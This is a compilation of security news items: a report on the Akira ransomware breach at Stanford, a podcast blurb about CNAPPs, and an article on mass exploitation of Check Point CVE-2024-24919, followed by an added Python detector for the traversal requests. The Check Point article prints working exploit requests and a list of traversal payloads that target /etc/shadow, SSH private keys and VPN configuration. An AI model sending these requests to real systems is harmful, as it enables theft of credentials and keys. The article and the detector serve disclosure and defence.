Microsoft is investigating an ongoing Exchange Online outage preventing customers from sending emails and triggering 503 errors on affected systems. […] Read More
BleepingComputer
Stanford University Hacked – Attackers Breached The Internal Network
Stanford, CA – Stanford University is reaching out to individuals potentially impacted by a recent data security breach within its Department of Public Safety.
The breach, identified as a ransomware attack on September 27, 2023, prompted immediate action from the university, including notifications to law enforcement agencies and initiating a thorough investigation with a leading forensic investigator.
Stanford University said that the investigation revealed unauthorized access to the Department of Public Safety’s network from May 12, 2023, until the breach was discovered.
Swift measures were taken to terminate the unauthorized access and secure the network. It is important to note that the incident was isolated to the Department of Public Safety’s systems and did not affect other Stanford networks or systems. Currently, no evidence suggests that any of the accessed information has been misused.
In February 2023, Stanford University reported another data breach following the exposure of admissions information for the Department of Economics Ph.D. program online from December 2022 to January 2023.
The comprehensive forensic investigation has now identified individuals whose information may have been compromised. Stanford is notifying these individuals via mail and providing them with details on complimentary identity protection services.
According to data breach alerts sent to Maine’s Attorney General, the attackers stole documents containing the personally identifiable information (PII) of 27,000 people.
The types of personal information potentially affected include, but are not limited to, dates of birth, Social Security numbers, government IDs, passport numbers, driver’s license numbers, and, in some cases, biometric data, health/medical information, email addresses with passwords, usernames with passwords, security questions and answers, digital signatures, and credit card information with security codes.
The Akira ransomware group is believed to be behind this attack. The group has stated that it took 430Gb of files from Stanford University’s internal systems and is asking for nearly a million dollars in ransom.
The Akira ransomware group, which first appeared in March 2023, has been identified as a serious threat to data security. It encrypts data and demands a ransom for decryption, affecting Windows and Linux devices.
Stanford University takes the privacy and security of community members very seriously and is committed to supporting all those affected. The law enforcement investigation into the incident is ongoing, and Stanford is cooperating fully.
The post Stanford University Hacked – Attackers Breached The Internal Network appeared first on Cyber Security News.
Cyber Security News
What’s a CNAPP: Cloud-Native Application Protection Platform?
In this episode of CyberWire-X, N2K’s CSO, Chief Analyst, and Senior Fellow, Rick Howard, is joined by Tim Miller, Technical Marketing Engineer for Panoptica, Cisco’s cloud application security solution (Panoptica came out of Outshift, Cisco’s incubation engine for new products and markets), and by Kevin Ford, Esri’s CISO. They discuss how Cloud-Native Application Protection Platforms (CNAPPs) address the need to reduce complexity. Outshift by Cisco is our CyberWire-X episode sponsor. Read More
The CyberWire
Huge Surge in Attacks Exploiting Check Point VPN Zero-Day Vulnerability
Check Point published an advisory regarding a critical vulnerability, CVE-2024-24919, which has since seen a surge in exploitation attempts.
The vulnerability, rated with a CVSS score of 8.6, allows attackers to access sensitive information on the Security Gateway, potentially leading to lateral movement and domain admin privileges.
According to a GreyNoise blog post, the core issue is a path traversal vulnerability.
A path traversal vulnerability allows an attacker to read files and directories stored outside the web root folder.
The exploit is a crafted POST request to the server; because the handling process runs as root, the attacker can read any file on the filesystem.
The exploit, as reverse-engineered by both Check Point and watchTowr labs, looks like this:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Check Point’s advisory, although somewhat vague, highlighted the severity of the vulnerability.
The advisory noted that exploiting this vulnerability could result in accessing sensitive information and potentially lead to domain admin privileges.
Buried deep within the advisory, however, was the note that attacks in the wild had been occurring since April 7, 2024.
Two days after the advisory, on May 30, 2024, watchTowr labs published a detailed write-up, including a working proof of concept.
The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-24919 to its Known Exploited Vulnerabilities list on the same day. By May 31, 2024, exploitation attempts were being observed globally.
Sift, a cybersecurity monitoring tool, tagged the issue quickly. The first exploit attempt was logged on May 30, 2024, although it was a non-working exploit.
The first successful exploitation attempt was recorded on May 31, 2024, at around 9:30 AM UTC. The payload used in these attempts was identical to the proof of concept published by watchTowr labs.
A manual search of honeypot data revealed that the oldest exploit attempts started on May 30, 2024, at about 5 PM UTC.
These attempts, however, did not work, indicating that attackers were still refining their methods.
The first real exploitation was observed on May 31, 2024, from a New York-based IP address.
POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38
/clients/MyCRL/../../../..//etc/passwd
[Figure: graph showing the surge in exploitation attempts]
As of June 4, 2024, the top-10 list of plausibly-working payloads observed includes:
../../../../../../../etc/fstab – 4805 attempts
../../../../../../../etc/shadow – 2453 attempts
../../../../../../../sysimg/CPwrapper/SU/Products.conf – 980 attempts
../../../../../../../config/db/initial – 959 attempts
../../../../../../../etc/passwd – 508 attempts
../../../../../../../home/*/.ssh/authorized_keys – 202 attempts
../../../../../../../opt/checkpoint/conf/ – 166 attempts
../../../../../../../etc/ssh/sshd_config – 165 attempts
../../../../../../../etc/vpn/vpn.conf – 163 attempts
../../../../../../../home/*/.ssh/id_rsa – 161 attempts
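As an added, defender-side example that is not part of the original article and not GreyNoise's or Check Point's code: a small Python detector that takes a request (method, path, body), resolves a traversal body sent to /clients/MyCRL to the absolute file it would reach, and flags it when it lands on one of the files in the top-10 list above. The request records are constructed for the example (the first two bodies mirror the payloads quoted in the article); the sensitive-file list mirrors the page's top-10, with the trailing-slash entry treated as a directory prefix. Path normalization is done generically, so it also collapses percent-encoded dots, doubled slashes and the aCSHELL/../ prefix to the same target.

```python
import re
from collections import Counter
from fnmatch import fnmatch
from typing import Optional
from urllib.parse import unquote

# Constructed request records (method, path, body), shaped like what a
# reverse-proxy or WAF log pipeline might hand a detector. Not captured
# traffic: the first two bodies mirror the payloads quoted in the article,
# the rest are variations and benign controls made up for this example.
SAMPLE_REQUESTS = [
    ("POST", "/clients/MyCRL", "aCSHELL/../../../../../../../etc/shadow"),
    ("POST", "/clients/MyCRL", "/clients/MyCRL/../../../..//etc/passwd"),
    ("POST", "/clients/MyCRL", "../../../../../../../home/*/.ssh/authorized_keys"),
    ("POST", "/clients/MyCRL", "%2e%2e/%2e%2e/%2e%2e/etc/fstab"),
    ("GET", "/clients/MyCRL", ""),
    ("POST", "/clients/MyCRL", "CRLs/ca.crl"),
    ("POST", "/login", "../../etc/passwd"),
]

# Glob patterns for the files the article's top-10 payload list targets.
# "/opt/checkpoint/conf/" is written as a prefix so the directory itself
# and anything under it both match.
SENSITIVE_TARGETS = [
    "/etc/fstab",
    "/etc/shadow",
    "/sysimg/CPwrapper/SU/Products.conf",
    "/config/db/initial",
    "/etc/passwd",
    "/home/*/.ssh/authorized_keys",
    "/opt/checkpoint/conf*",
    "/etc/ssh/sshd_config",
    "/etc/vpn/vpn.conf",
    "/home/*/.ssh/id_rsa",
]

# A '..' that forms a whole path segment (not '..' inside a filename).
TRAVERSAL_SEGMENT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def normalize_target(decoded_body: str) -> str:
    """Resolve an already percent-decoded traversal payload to the absolute
    path it would reach, treating the web root as '/' and clamping '..' at
    the root (so any number of leading '../' collapses to the same target).
    """
    parts = []
    for segment in decoded_body.split("/"):
        if segment in ("", "."):
            continue  # empty segment from '//' or a leading '/', or '.'
        if segment == "..":
            if parts:
                parts.pop()
            continue
        parts.append(segment)
    return "/" + "/".join(parts)


def classify(method: str, path: str, body: str) -> Optional[dict]:
    """Return a finding for a POST to /clients/MyCRL whose body contains a
    traversal segment; return None for any other request."""
    if method != "POST" or path != "/clients/MyCRL":
        return None
    decoded = unquote(body)  # one decode pass; add a second for double-encoding
    if not TRAVERSAL_SEGMENT.search(decoded):
        return None
    target = normalize_target(decoded)
    return {
        "target": target,
        "sensitive": any(fnmatch(target, pat) for pat in SENSITIVE_TARGETS),
    }


def scan(requests) -> Counter:
    """Tally resolved targets across a batch of requests, producing the
    same kind of per-payload count the article reports."""
    hits = Counter()
    for method, path, body in requests:
        finding = classify(method, path, body)
        if finding is not None:
            hits[finding["target"]] += 1
    return hits


if __name__ == "__main__":
    for target, count in scan(SAMPLE_REQUESTS).most_common():
        print(f"{target} - {count} attempt(s)")
```

Matching on the resolved target rather than on the literal body is the point: the article's own two samples reach /etc/shadow and /etc/passwd through different prefixes and slash counts, and a signature keyed on one literal string would miss the other.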
The rapid increase in exploitation attempts following the public disclosure of CVE-2024-24919 underscores the critical need for organizations to patch their systems promptly.
With a public proof of concept available and exploitation ramping up, all affected entities must apply the necessary patches to mitigate this severe vulnerability.
The post Huge Surge in Attacks Exploiting Check Point VPN Zero-Day Vulnerability appeared first on Cyber Security News.